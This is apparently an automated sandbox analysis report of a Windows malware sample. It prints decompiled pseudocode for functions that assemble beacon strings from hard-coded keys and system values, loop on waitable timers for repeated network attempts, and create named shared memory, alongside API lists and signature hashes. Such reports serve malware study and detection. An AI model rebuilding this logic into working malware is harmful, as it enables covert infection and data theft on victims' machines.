                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,7614F7F0,00000000,761536A0), ref: 736D6C56
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID: zdms
                                                                                                                                                                                                                                • API String ID: 4275171209-1934084468
                                                                                                                                                                                                                                • Opcode ID: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
                                                                                                                                                                                                                                • Instruction ID: 774b0289d904b06fdd56817648df59fe60c0c5a46fdbc45900e6772045a7fd53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BD1B275A10A16CFCF11CF58C680BAAB7B6FF48314F6941A9D806AB3C6D370E951CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8A565, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                                                			E00A8A565(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xa8d018; // 0x9ad51634
				asm("bswap eax");
				_t27 =  *0xa8d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xa8d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0xa8d00c; // 0x13d015ef
				asm("bswap eax");
				_t30 =  *0xa8d2e0; // 0x105a5a8
				_t3 = _t30 + 0xa8e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f878, _t29, _t28, _t27, _t26,  *0xa8d02c,  *0xa8d004, _t25);
				_t33 = E00A85C12();
				_t34 =  *0xa8d2e0; // 0x105a5a8
				_t4 = _t34 + 0xa8e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E00A8508C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0xa8d2e0; // 0x105a5a8
					_t6 = _t83 + 0xa8e8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xa8d270, 0, _t96);
				}
				_t97 = E00A86706();
				if(_t97 != 0) {
					_t78 =  *0xa8d2e0; // 0x105a5a8
					_t8 = _t78 + 0xa8e8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xa8d270, 0, _t97);
				}
				_t98 =  *0xa8d364; // 0x1ae95b0
				_a32 = E00A86DFA(0xa8d00a, _t98 + 4);
				_t42 =  *0xa8d308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xa8d2e0; // 0x105a5a8
					_t11 = _t74 + 0xa8e8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xa8d304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xa8d2e0; // 0x105a5a8
					_t13 = _t71 + 0xa8e885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0xa8d270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E00A8A425(GetTickCount());
						_t50 =  *0xa8d364; // 0x1ae95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xa8d364; // 0x1ae95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xa8d364; // 0x1ae95b0
						_t103 = E00A822AB(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xa8c2ac);
							_push(_t103);
							_t62 = E00A82629();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00A82168(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00A8651D();
								}
								RtlFreeHeap( *0xa8d270, 0, _v44); // executed
							}
							HeapFree( *0xa8d270, 0, _t103);
						}
						RtlFreeHeap( *0xa8d270, 0, _t100); // executed
					}
					HeapFree( *0xa8d270, 0, _a24);
				}
				RtlFreeHeap( *0xa8d270, 0, _t105); // executed
				return _a4;
			}


















































                                                                                                                                                                                                                                0x00a8a565
                                                                                                                                                                                                                                0x00a8a565
                                                                                                                                                                                                                                0x00a8a565
                                                                                                                                                                                                                                0x00a8a56a
                                                                                                                                                                                                                                0x00a8a570
                                                                                                                                                                                                                                0x00a8a57a
                                                                                                                                                                                                                                0x00a8a57c
                                                                                                                                                                                                                                0x00a8a57c
                                                                                                                                                                                                                                0x00a8a589
                                                                                                                                                                                                                                0x00a8a594
                                                                                                                                                                                                                                0x00a8a597
                                                                                                                                                                                                                                0x00a8a5a2
                                                                                                                                                                                                                                0x00a8a5a5
                                                                                                                                                                                                                                0x00a8a5aa
                                                                                                                                                                                                                                0x00a8a5ad
                                                                                                                                                                                                                                0x00a8a5b2
                                                                                                                                                                                                                                0x00a8a5b5
                                                                                                                                                                                                                                0x00a8a5c1
                                                                                                                                                                                                                                0x00a8a5ce
                                                                                                                                                                                                                                0x00a8a5d0
                                                                                                                                                                                                                                0x00a8a5d6
                                                                                                                                                                                                                                0x00a8a5db
                                                                                                                                                                                                                                0x00a8a5e6
                                                                                                                                                                                                                                0x00a8a5e8
                                                                                                                                                                                                                                0x00a8a5eb
                                                                                                                                                                                                                                0x00a8a5ed
                                                                                                                                                                                                                                0x00a8a5f2
                                                                                                                                                                                                                                0x00a8a5f6
                                                                                                                                                                                                                                0x00a8a5f8
                                                                                                                                                                                                                                0x00a8a5fd
                                                                                                                                                                                                                                0x00a8a609
                                                                                                                                                                                                                                0x00a8a60b
                                                                                                                                                                                                                                0x00a8a617
                                                                                                                                                                                                                                0x00a8a619
                                                                                                                                                                                                                                0x00a8a619
                                                                                                                                                                                                                                0x00a8a624
                                                                                                                                                                                                                                0x00a8a628
                                                                                                                                                                                                                                0x00a8a62a
                                                                                                                                                                                                                                0x00a8a62f
                                                                                                                                                                                                                                0x00a8a63b
                                                                                                                                                                                                                                0x00a8a63d
                                                                                                                                                                                                                                0x00a8a649
                                                                                                                                                                                                                                0x00a8a64b
                                                                                                                                                                                                                                0x00a8a64b
                                                                                                                                                                                                                                0x00a8a651
                                                                                                                                                                                                                                0x00a8a664
                                                                                                                                                                                                                                0x00a8a668
                                                                                                                                                                                                                                0x00a8a66f
                                                                                                                                                                                                                                0x00a8a672
                                                                                                                                                                                                                                0x00a8a677
                                                                                                                                                                                                                                0x00a8a682
                                                                                                                                                                                                                                0x00a8a684
                                                                                                                                                                                                                                0x00a8a687
                                                                                                                                                                                                                                0x00a8a687
                                                                                                                                                                                                                                0x00a8a689
                                                                                                                                                                                                                                0x00a8a690
                                                                                                                                                                                                                                0x00a8a693
                                                                                                                                                                                                                                0x00a8a698
                                                                                                                                                                                                                                0x00a8a6a2
                                                                                                                                                                                                                                0x00a8a6a4
                                                                                                                                                                                                                                0x00a8a6ac
                                                                                                                                                                                                                                0x00a8a6bf
                                                                                                                                                                                                                                0x00a8a6c5
                                                                                                                                                                                                                                0x00a8a6c9
                                                                                                                                                                                                                                0x00a8a6d5
                                                                                                                                                                                                                                0x00a8a6da
                                                                                                                                                                                                                                0x00a8a6e3
                                                                                                                                                                                                                                0x00a8a6f4
                                                                                                                                                                                                                                0x00a8a6f8
                                                                                                                                                                                                                                0x00a8a701
                                                                                                                                                                                                                                0x00a8a707
                                                                                                                                                                                                                                0x00a8a714
                                                                                                                                                                                                                                0x00a8a721
                                                                                                                                                                                                                                0x00a8a727
                                                                                                                                                                                                                                0x00a8a733
                                                                                                                                                                                                                                0x00a8a739
                                                                                                                                                                                                                                0x00a8a73a
                                                                                                                                                                                                                                0x00a8a73f
                                                                                                                                                                                                                                0x00a8a745
                                                                                                                                                                                                                                0x00a8a74b
                                                                                                                                                                                                                                0x00a8a752
                                                                                                                                                                                                                                0x00a8a759
                                                                                                                                                                                                                                0x00a8a75f
                                                                                                                                                                                                                                0x00a8a766
                                                                                                                                                                                                                                0x00a8a76a
                                                                                                                                                                                                                                0x00a8a775
                                                                                                                                                                                                                                0x00a8a77a
                                                                                                                                                                                                                                0x00a8a780
                                                                                                                                                                                                                                0x00a8a789
                                                                                                                                                                                                                                0x00a8a789
                                                                                                                                                                                                                                0x00a8a79a
                                                                                                                                                                                                                                0x00a8a79a
                                                                                                                                                                                                                                0x00a8a7a9
                                                                                                                                                                                                                                0x00a8a7a9
                                                                                                                                                                                                                                0x00a8a7b8
                                                                                                                                                                                                                                0x00a8a7b8
                                                                                                                                                                                                                                0x00a8a7ca
                                                                                                                                                                                                                                0x00a8a7ca
                                                                                                                                                                                                                                0x00a8a7d9
                                                                                                                                                                                                                                0x00a8a7ea

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A8A57C
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A5C9
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A5E6
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A609
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A8A619
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A63B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A8A64B
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A682
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A6A2
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A8A6BF
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A8A6CF
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(01AE9570), ref: 00A8A6E3
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(01AE9570), ref: 00A8A701
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A8A714,?,01AE95B0), ref: 00A822D6
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrlen.KERNEL32(?,?,?,00A8A714,?,01AE95B0), ref: 00A822DE
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: strcpy.NTDLL ref: 00A822F5
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrcat.KERNEL32(00000000,?), ref: 00A82300
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A8A714,?,01AE95B0), ref: 00A8231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,00A8C2AC,?,01AE95B0), ref: 00A8A733
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrlen.KERNEL32(01AE9B98,00000000,00000000,770CC740,00A8A73F,00000000), ref: 00A82639
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrlen.KERNEL32(?), ref: 00A82641
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrcpy.KERNEL32(00000000,01AE9B98), ref: 00A82655
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrcat.KERNEL32(00000000,?), ref: 00A82660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 00A8A752
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00A8A759
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A8A766
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00A8A76A
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,00000000,?,?), ref: 00A8A79A
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A8A7A9
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,01AE95B0), ref: 00A8A7B8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A8A7CA
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?), ref: 00A8A7D9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3963266935-1536154274
                                                                                                                                                                                                                                • Opcode ID: 995d231aca8ec13d0a428ae2169b716c5f53c587e75d7fc75c347b18483e9c9c
                                                                                                                                                                                                                                • Instruction ID: 508a3fe40aaa7d6dfc1c25ad121bad46dd99a0d1d674875aff0d469f185b64e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 995d231aca8ec13d0a428ae2169b716c5f53c587e75d7fc75c347b18483e9c9c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8617B71500201EFD721EBE4ED48FAA3BB8FB48360F040525F949D72A1EB35E9179B66
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A89FF2, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150timememoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E00A89FF2(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xa8d278);
					_v20 = 0;
					_v16 = 0;
					L00A8AEC0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xa8d2a4; // 0x218
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xa8d284 = 5;
						} else {
							_t68 = E00A82932(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xa8d298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00A8462F(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00A8516C(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xa8d27c);
							goto L21;
						} else {
							__eflags =  *0xa8d280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00A8651D();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xa8d280);
								L21:
								L00A8AEC0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xa8d270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                                                                                                                                0x00a89ff2
                                                                                                                                                                                                                                0x00a8a004
                                                                                                                                                                                                                                0x00a8a007
                                                                                                                                                                                                                                0x00a8a013
                                                                                                                                                                                                                                0x00a8a019
                                                                                                                                                                                                                                0x00a8a01e
                                                                                                                                                                                                                                0x00a8a185
                                                                                                                                                                                                                                0x00a8a024
                                                                                                                                                                                                                                0x00a8a024
                                                                                                                                                                                                                                0x00a8a026
                                                                                                                                                                                                                                0x00a8a02b
                                                                                                                                                                                                                                0x00a8a02c
                                                                                                                                                                                                                                0x00a8a032
                                                                                                                                                                                                                                0x00a8a035
                                                                                                                                                                                                                                0x00a8a038
                                                                                                                                                                                                                                0x00a8a046
                                                                                                                                                                                                                                0x00a8a051
                                                                                                                                                                                                                                0x00a8a054
                                                                                                                                                                                                                                0x00a8a056
                                                                                                                                                                                                                                0x00a8a063
                                                                                                                                                                                                                                0x00a8a06d
                                                                                                                                                                                                                                0x00a8a06f
                                                                                                                                                                                                                                0x00a8a074
                                                                                                                                                                                                                                0x00a8a079
                                                                                                                                                                                                                                0x00a8a084
                                                                                                                                                                                                                                0x00a8a084
                                                                                                                                                                                                                                0x00a8a07b
                                                                                                                                                                                                                                0x00a8a07b
                                                                                                                                                                                                                                0x00a8a082
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a082
                                                                                                                                                                                                                                0x00a8a08e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a091
                                                                                                                                                                                                                                0x00a8a095
                                                                                                                                                                                                                                0x00a8a0a0
                                                                                                                                                                                                                                0x00a8a0a0
                                                                                                                                                                                                                                0x00a8a0a7
                                                                                                                                                                                                                                0x00a8a0b0
                                                                                                                                                                                                                                0x00a8a0b7
                                                                                                                                                                                                                                0x00a8a0c0
                                                                                                                                                                                                                                0x00a8a0c3
                                                                                                                                                                                                                                0x00a8a0c6
                                                                                                                                                                                                                                0x00a8a0cb
                                                                                                                                                                                                                                0x00a8a0d0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a0d2
                                                                                                                                                                                                                                0x00a8a0d5
                                                                                                                                                                                                                                0x00a8a0d8
                                                                                                                                                                                                                                0x00a8a0db
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a0dd
                                                                                                                                                                                                                                0x00a8a0ec
                                                                                                                                                                                                                                0x00a8a0ec
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a11a
                                                                                                                                                                                                                                0x00a8a11a
                                                                                                                                                                                                                                0x00a8a11f
                                                                                                                                                                                                                                0x00a8a13e
                                                                                                                                                                                                                                0x00a8a140
                                                                                                                                                                                                                                0x00a8a145
                                                                                                                                                                                                                                0x00a8a146
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a121
                                                                                                                                                                                                                                0x00a8a121
                                                                                                                                                                                                                                0x00a8a127
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a129
                                                                                                                                                                                                                                0x00a8a129
                                                                                                                                                                                                                                0x00a8a12e
                                                                                                                                                                                                                                0x00a8a130
                                                                                                                                                                                                                                0x00a8a135
                                                                                                                                                                                                                                0x00a8a136
                                                                                                                                                                                                                                0x00a8a14c
                                                                                                                                                                                                                                0x00a8a14c
                                                                                                                                                                                                                                0x00a8a154
                                                                                                                                                                                                                                0x00a8a15f
                                                                                                                                                                                                                                0x00a8a162
                                                                                                                                                                                                                                0x00a8a16d
                                                                                                                                                                                                                                0x00a8a16f
                                                                                                                                                                                                                                0x00a8a172
                                                                                                                                                                                                                                0x00a8a174
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a17a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a17a
                                                                                                                                                                                                                                0x00a8a174
                                                                                                                                                                                                                                0x00a8a127
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a11f
                                                                                                                                                                                                                                0x00a8a0ef
                                                                                                                                                                                                                                0x00a8a0f1
                                                                                                                                                                                                                                0x00a8a0f4
                                                                                                                                                                                                                                0x00a8a0f5
                                                                                                                                                                                                                                0x00a8a0f5
                                                                                                                                                                                                                                0x00a8a0f9
                                                                                                                                                                                                                                0x00a8a103
                                                                                                                                                                                                                                0x00a8a103
                                                                                                                                                                                                                                0x00a8a109
                                                                                                                                                                                                                                0x00a8a10c
                                                                                                                                                                                                                                0x00a8a10c
                                                                                                                                                                                                                                0x00a8a112
                                                                                                                                                                                                                                0x00a8a112
                                                                                                                                                                                                                                0x00a8a18f
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A8A007
                                                                                                                                                                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A8A013
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A8A038
                                                                                                                                                                                                                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00A8A054
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A8A06D
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A8A103
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A8A112
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A8A14C
                                                                                                                                                                                                                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A858BD,?), ref: 00A8A162
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A8A16D
                                                                                                                                                                                                                                  • Part of subcall function 00A82932: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01AE9370,00000000,?,747DF710,00000000,747DF730), ref: 00A82981
                                                                                                                                                                                                                                  • Part of subcall function 00A82932: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01AE93A8,?,00000000,30314549,00000014,004F0053,01AE9364), ref: 00A82A1E
                                                                                                                                                                                                                                  • Part of subcall function 00A82932: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A8A080), ref: 00A82A30
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A8A17F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3521023985-2342693527
                                                                                                                                                                                                                                • Opcode ID: 122823cbc07cc5c57cc4b213a0ac6b5639709a970953654763ceff6936983acf
                                                                                                                                                                                                                                • Instruction ID: 7f170221c1716a5187db04f30e5981ebbf3d153f279cf59b7459ef7ca88a09b1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 122823cbc07cc5c57cc4b213a0ac6b5639709a970953654763ceff6936983acf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6515C71801228EBEF11EFE4DD44DEEBFB8EF19360F204616F414A6290D7709A41DBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A81DF5, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A81DF5(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00A8AEBA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xa8d2e0; // 0x105a5a8
				_t5 = _t13 + 0xa8e876; // 0x1ae8e1e
				_t6 = _t13 + 0xa8e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00A8ABDA();
				_t17 = CreateFileMappingW(0xffffffff, 0xa8d2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                                                                                                                                0x00a81df5
